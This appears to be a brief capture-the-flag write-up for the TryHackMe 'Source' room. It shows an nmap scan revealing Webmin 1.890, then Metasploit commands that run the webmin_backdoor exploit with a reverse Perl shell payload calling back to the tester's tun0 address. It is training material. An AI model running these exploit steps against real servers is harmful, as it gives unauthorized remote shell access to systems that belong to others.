Source
https://tryhackme.com/room/source
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b74cd0bde27b1b15722764562915ea23 (RSA)
| 256 b78523114f44fa22008e40775ecf287c (ECDSA)
|_ 256 a9fe4b82bf893459365becdac2d395ce (ED25519)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 7B403D3D5C87B168EA5B8ADA089E342C
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelmsf6 > use exploit/linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_backdoor) > set rhost 10.10.186.27
rhost => 10.10.186.27
msf6 exploit(linux/http/webmin_backdoor) > set lhost tun0
lhost => NOTSHOWN
msf6 exploit(linux/http/webmin_backdoor) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 exploit(linux/http/webmin_backdoor) > runLast updated